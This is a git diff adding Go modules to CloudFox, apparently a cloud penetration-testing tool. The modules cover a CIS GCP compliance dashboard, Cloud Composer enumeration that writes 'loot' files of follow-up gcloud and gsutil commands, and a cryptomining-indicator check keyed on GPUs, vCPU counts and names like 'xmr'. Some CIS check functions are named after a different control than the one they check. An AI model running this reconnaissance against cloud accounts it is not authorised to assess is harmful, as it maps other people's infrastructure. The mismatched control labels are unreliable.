+ } + + if findings, ok := m.sccFindings["SSL_NOT_ENFORCED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_4_SQLNoPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL database instances are configured with automated backups", + Description: "Automated backups ensure data recovery capability", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable automated backups for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_BACKUP_DISABLED"]; ok && 
len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_5_SQLBackups(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances are using the latest major version", + Description: "Use latest major database version for security updates", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Upgrade Cloud SQL instances to latest major version", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_6_SQLContainedDB(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure contained database authentication is off for SQL Server", + Description: "Disable contained database authentication for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'contained database authentication' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_7_SQLCrossDBAOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure cross db ownership chaining is off for SQL Server", + Description: "Disable cross db ownership chaining for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'cross db ownership chaining' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 7: BigQuery Controls +func (m *ComplianceDashboardModule) checkCIS_7_1_BigQueryCMEK(ctx context.Context, logger internal.Logger) { + control := 
ComplianceControl{ + ControlID: "CIS-7.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery datasets", + } + + if findings, ok := m.sccFindings["DATASET_CMEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_2_BigQueryTableCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery tables are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery tables", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery tables", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_3_BigQueryDatasetPublic(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are not publicly accessible", + Description: "BigQuery datasets should not allow allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from BigQuery datasets", + } + + if findings, ok := m.sccFindings["PUBLIC_DATASET"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible BigQuery datasets", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "bigquery-dataset", m.getProjectFromResource(resource)) + } + } else { + control.Status 
= "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// ------------------------------ +// Framework Mapping +// ------------------------------ +func (m *ComplianceDashboardModule) mapToFrameworks() { + // Map CIS controls to other frameworks + for _, control := range m.Controls { + // Update CIS framework stats + if fw, ok := m.Frameworks["CIS-GCP-2.0"]; ok { + fw.TotalControls++ + switch control.Status { + case "PASS": + fw.PassedControls++ + case "FAIL": + fw.FailedControls++ + case "MANUAL": + fw.ManualControls++ + case "NOT_APPLICABLE": + fw.NAControls++ + } + } + } + + // Calculate scores for each framework + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + assessed := fw.PassedControls + fw.FailedControls + if assessed > 0 { + fw.Score = float64(fw.PassedControls) / float64(assessed) * 100 + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *ComplianceDashboardModule) addFailure(control ComplianceControl, resource, resourceType, projectID string) { + failure := ComplianceFailure{ + ControlID: control.ControlID, + Framework: control.Framework, + ControlName: control.ControlName, + Severity: control.Severity, + ResourceName: resource, + ResourceType: resourceType, + ProjectID: projectID, + Details: control.Details, + Remediation: control.Remediation, + RiskScore: m.calculateComplianceRiskScore(control.Severity), + } + + m.mu.Lock() + m.Failures = append(m.Failures, failure) + m.mu.Unlock() + + // Add to loot + m.addFailureToLoot(failure) +} + +func (m *ComplianceDashboardModule) calculateComplianceRiskScore(severity string) int { + switch severity { + case "CRITICAL": + return 100 + case "HIGH": + return 80 + case "MEDIUM": + return 50 + case "LOW": + return 25 + default: + return 10 + } +} + +func (m *ComplianceDashboardModule) getProjectFromResource(resource string) string { + // Extract project ID from resource name + // Format: 
projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ComplianceDashboardModule) initializeLootFiles() { + m.LootMap["compliance-critical-failures"] = &internal.LootFile{ + Name: "compliance-critical-failures", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# These require immediate remediation!\n\n", + } + m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ + Name: "compliance-remediation-commands", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-by-framework"] = &internal.LootFile{ + Name: "compliance-by-framework", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-failed-controls"] = &internal.LootFile{ + Name: "compliance-failed-controls", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n\n", + } +} + +func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) { + m.mu.Lock() + defer m.mu.Unlock() + + // Critical failures + if failure.Severity == "CRITICAL" { + m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( + "## %s - %s\n"+ + "Framework: %s\n"+ + "Resource: %s\n"+ + "Project: %s\n"+ + "Risk Score: %d\n"+ + "Remediation: %s\n\n", + failure.ControlID, + failure.ControlName, + failure.Framework, + failure.ResourceName, + failure.ProjectID, + failure.RiskScore, + failure.Remediation, + ) + } + + // Remediation commands + m.LootMap["compliance-remediation-commands"].Contents += fmt.Sprintf( + "# %s: %s\n"+ + "# Resource: %s\n"+ + "# %s\n\n", + failure.ControlID, + failure.ControlName, + failure.ResourceName, + failure.Remediation, 
+ ) + + // Failed controls + m.LootMap["compliance-failed-controls"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + failure.ControlID, + failure.Severity, + failure.ResourceName, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort controls by severity, then control ID + sort.Slice(m.Controls, func(i, j int) bool { + if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { + return true + } + if m.Controls[i].Status != "FAIL" && m.Controls[j].Status == "FAIL" { + return false + } + severityOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + if severityOrder[m.Controls[i].Severity] != severityOrder[m.Controls[j].Severity] { + return severityOrder[m.Controls[i].Severity] < severityOrder[m.Controls[j].Severity] + } + return m.Controls[i].ControlID < m.Controls[j].ControlID + }) + + // Controls table + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range m.Controls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + // Failures table + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range m.Failures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + // Framework summary table + frameworkHeader := []string{ + "Framework", + "Version", + "Total", + "Passed", + "Failed", + "Manual", + "Score (%)", + } + + var frameworkBody 
[][]string + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + frameworkBody = append(frameworkBody, []string{ + fw.Name, + fw.Version, + fmt.Sprintf("%d", fw.TotalControls), + fmt.Sprintf("%d", fw.PassedControls), + fmt.Sprintf("%d", fw.FailedControls), + fmt.Sprintf("%d", fw.ManualControls), + fmt.Sprintf("%.1f", fw.Score), + }) + } + } + + // Add framework summary to loot + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + m.LootMap["compliance-by-framework"].Contents += fmt.Sprintf( + "## %s v%s\n"+ + "Total Controls: %d\n"+ + "Passed: %d\n"+ + "Failed: %d\n"+ + "Manual Review: %d\n"+ + "Compliance Score: %.1f%%\n\n", + fw.Name, + fw.Version, + fw.TotalControls, + fw.PassedControls, + fw.FailedControls, + fw.ManualControls, + fw.Score, + ) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + output := ComplianceDashboardOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + 
scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go new file mode 100644 index 00000000..37305daf --- /dev/null +++ b/gcp/commands/composer.go @@ -0,0 +1,223 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPComposerCommand = &cobra.Command{ + Use: globals.GCP_COMPOSER_MODULE_NAME, + Aliases: []string{"airflow"}, + Short: "Enumerate Cloud Composer environments", + Long: `Enumerate Cloud Composer (managed Apache Airflow) environments. + +Features: +- Lists all Composer environments across locations +- Shows Airflow web UI endpoints +- Identifies service account configuration +- Analyzes network exposure (private vs public) +- Detects overly permissive IP restrictions`, + Run: runGCPComposerCommand, +} + +type ComposerModule struct { + gcpinternal.BaseGCPModule + Environments []composerservice.EnvironmentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type ComposerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComposerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComposerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPComposerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_COMPOSER_MODULE_NAME) + if err != nil { + return + } + + module := &ComposerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Environments: []composerservice.EnvironmentInfo{}, + LootMap: 
make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) + + if len(m.Environments) == 0 { + logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicEnvs := 0 + for _, env := range m.Environments { + if env.State == "RUNNING" { + running++ + } + if !env.PrivateEnvironment { + publicEnvs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", + len(m.Environments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) + } + + svc := composerservice.New() + environments, err := svc.ListEnvironments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_COMPOSER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Composer environments in project %s", projectID)) + return + } + + m.mu.Lock() + m.Environments = append(m.Environments, environments...) 
+ for _, env := range environments { + m.addToLoot(env) + } + m.mu.Unlock() +} + +func (m *ComposerModule) initializeLootFiles() { + m.LootMap["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + env.Name, env.Location, + env.ProjectID, + ) + + // gcloud commands + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gcloud composer environments describe %s --location=%s --project=%s\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // DAG bucket command + if env.DagGcsPrefix != "" { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gsutil ls %s\n", + env.DagGcsPrefix, + ) + } + + // Airflow Web UI + if env.AirflowURI != "" { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# Airflow Web UI: %s\n", + env.AirflowURI, + ) + } + + m.LootMap["composer-commands"].Contents += "\n" +} + +func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Service Account", + "Private", + "Private Endpoint", + "Airflow URI", + "DAG Bucket", + "Image Version", + } + + var body [][]string + for _, env := range m.Environments { + sa := env.ServiceAccount + if sa == "" { + sa = "(default)" + } + + airflowURI := env.AirflowURI + if airflowURI == "" { + airflowURI = "-" + } + + dagBucket := env.DagGcsPrefix + if dagBucket == "" { + dagBucket = "-" + } + + imageVersion := env.ImageVersion + if imageVersion == "" { + imageVersion = "-" + } + + body = append(body, []string{ + m.GetProjectName(env.ProjectID), + env.ProjectID, + env.Name, + env.Location, + env.State, 
+ sa, + boolToYesNo(env.PrivateEnvironment), + boolToYesNo(env.EnablePrivateEndpoint), + airflowURI, + dagBucket, + imageVersion, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "composer", Header: header, Body: body}} + + output := ComposerOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go new file mode 100644 index 00000000..cbc44526 --- /dev/null +++ b/gcp/commands/costsecurity.go @@ -0,0 +1,974 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" + "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" + +var GCPCostSecurityCommand = &cobra.Command{ + Use: GCP_COSTSECURITY_MODULE_NAME, + Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Hidden: true, + Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", + Long: `Analyze resources for cost-related security issues and waste. 
+ +Features: +- Detects potential cryptomining indicators (high CPU instances, GPUs) +- Identifies orphaned resources (unattached disks, unused IPs) +- Finds expensive idle resources +- Analyzes resource utilization patterns +- Identifies resources without cost allocation labels +- Detects unusual resource creation patterns + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/storage.admin +- roles/cloudsql.viewer`, + Run: runGCPCostSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type CostAnomaly struct { + Name string + ProjectID string + ResourceType string + AnomalyType string // cryptomining, orphaned, idle, unlabeled, unusual-creation + Severity string + Details string + EstCostMonth float64 + CreatedTime string + Location string + Remediation string +} + +type OrphanedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + Status string + CreatedTime string + EstCostMonth float64 + Reason string +} + +type ExpensiveResource struct { + Name string + ProjectID string + ResourceType string + Location string + MachineType string + VCPUs int64 + MemoryGB float64 + GPUs int + Status string + CreatedTime string + Labels map[string]string + EstCostMonth float64 +} + +type CryptominingIndicator struct { + Name string + ProjectID string + ResourceType string + Location string + Indicator string + Confidence string // HIGH, MEDIUM, LOW + Details string + CreatedTime string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CostSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + CostAnomalies []CostAnomaly + Orphaned []OrphanedResource + Expensive []ExpensiveResource + Cryptomining []CryptominingIndicator + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalEstCost float64 + orphanedEstCost float64 + 
cryptoIndicators int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CostSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CostSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CostSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCostSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COSTSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &CostSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CostAnomalies: []CostAnomaly{}, + Orphaned: []OrphanedResource{}, + Expensive: []ExpensiveResource{}, + Cryptomining: []CryptominingIndicator{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CostSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing resources for cost anomalies and security issues...", GCP_COSTSECURITY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + return + } + + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Storage service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= 
globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, storageService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Check results + totalFindings := len(m.CostAnomalies) + len(m.Orphaned) + len(m.Cryptomining) + if totalFindings == 0 { + logger.InfoM("No cost anomalies or security issues found", GCP_COSTSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d cost anomaly(ies), %d orphaned resource(s), %d cryptomining indicator(s)", + len(m.CostAnomalies), len(m.Orphaned), len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + + if len(m.Cryptomining) > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d potential cryptomining indicator(s) detected!", len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + } + + if m.orphanedEstCost > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Estimated monthly cost of orphaned resources: $%.2f", m.orphanedEstCost), GCP_COSTSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CostSecurityModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, storageService *storage.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing costs for project: %s", projectID), GCP_COSTSECURITY_MODULE_NAME) + } + + // Analyze compute instances + m.analyzeComputeInstances(ctx, projectID, computeService, logger) + + // Find orphaned disks + m.findOrphanedDisks(ctx, projectID, computeService, logger) + + // Find orphaned IPs + m.findOrphanedIPs(ctx, projectID, computeService, logger) + 
+ // Analyze SQL instances + if sqlService != nil { + m.analyzeSQLInstances(ctx, projectID, sqlService, logger) + } + + // Analyze storage buckets + if storageService != nil { + m.analyzeStorageBuckets(ctx, projectID, storageService, logger) + } +} + +func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instanceList := range page.Items { + if instanceList.Instances == nil { + continue + } + for _, instance := range instanceList.Instances { + m.analyzeInstance(instance, projectID, m.extractZoneFromURL(zone), logger) + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate compute instances in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeInstance(instance *compute.Instance, projectID, zone string, logger internal.Logger) { + machineType := m.extractMachineTypeName(instance.MachineType) + vcpus, memGB := m.parseMachineType(machineType) + + // Count GPUs + gpuCount := 0 + for _, accel := range instance.GuestAccelerators { + gpuCount += int(accel.AcceleratorCount) + } + + // Check for cryptomining indicators + m.checkCryptominingIndicators(instance, projectID, zone, machineType, vcpus, memGB, gpuCount) + + // Check for expensive resources + estCost := m.estimateInstanceCost(machineType, vcpus, memGB, gpuCount) + if estCost > 500 { // Monthly threshold + expensive := ExpensiveResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + MachineType: machineType, + VCPUs: vcpus, + MemoryGB: memGB, + GPUs: gpuCount, + Status: instance.Status, + CreatedTime: instance.CreationTimestamp, + Labels: instance.Labels, + EstCostMonth: estCost, 
+ } + + m.mu.Lock() + m.Expensive = append(m.Expensive, expensive) + m.totalEstCost += estCost + m.mu.Unlock() + } + + // Check for unlabeled resources + if len(instance.Labels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Instance has no cost allocation labels", + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: fmt.Sprintf("gcloud compute instances add-labels %s --labels=cost-center=UNKNOWN,owner=UNKNOWN --zone=%s --project=%s", instance.Name, zone, projectID), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for unusual creation times (off-hours) + m.checkUnusualCreation(instance, projectID, zone, estCost) +} + +func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Instance, projectID, zone, machineType string, vcpus int64, memGB float64, gpuCount int) { + indicators := []CryptominingIndicator{} + + // Indicator 1: GPU instance + if gpuCount > 0 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "GPU_INSTANCE", + Confidence: "MEDIUM", + Details: fmt.Sprintf("Instance has %d GPU(s) attached", gpuCount), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance is authorized for GPU workloads", + } + indicators = append(indicators, indicator) + } + + // Indicator 2: High CPU count + if vcpus >= 32 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("Instance has %d vCPUs (high compute capacity)", vcpus), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance's CPU usage is legitimate", + } + indicators = 
append(indicators, indicator) + } + + // Indicator 3: Preemptible/Spot with high specs (common for mining) + if instance.Scheduling != nil && instance.Scheduling.Preemptible && (vcpus >= 8 || gpuCount > 0) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "PREEMPTIBLE_HIGH_SPEC", + Confidence: "MEDIUM", + Details: "Preemptible instance with high specs (common mining pattern)", + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this preemptible instance is used for legitimate batch processing", + } + indicators = append(indicators, indicator) + } + + // Indicator 4: Suspicious naming patterns + nameLower := strings.ToLower(instance.Name) + suspiciousPatterns := []string{"miner", "mining", "xmr", "monero", "btc", "ethereum", "eth", "crypto", "hash"} + for _, pattern := range suspiciousPatterns { + if strings.Contains(nameLower, pattern) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "SUSPICIOUS_NAME", + Confidence: "HIGH", + Details: fmt.Sprintf("Instance name contains suspicious pattern: %s", pattern), + CreatedTime: instance.CreationTimestamp, + Remediation: "Investigate this instance immediately for cryptomining", + } + indicators = append(indicators, indicator) + break + } + } + + // Indicator 5: N2D/C2 machine types (AMD EPYC - preferred for mining) + if strings.HasPrefix(machineType, "n2d-") || strings.HasPrefix(machineType, "c2-") { + if vcpus >= 16 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "AMD_HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("AMD EPYC instance with high CPU (%s)", machineType), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify legitimate use of AMD EPYC high-CPU instance", + } + 
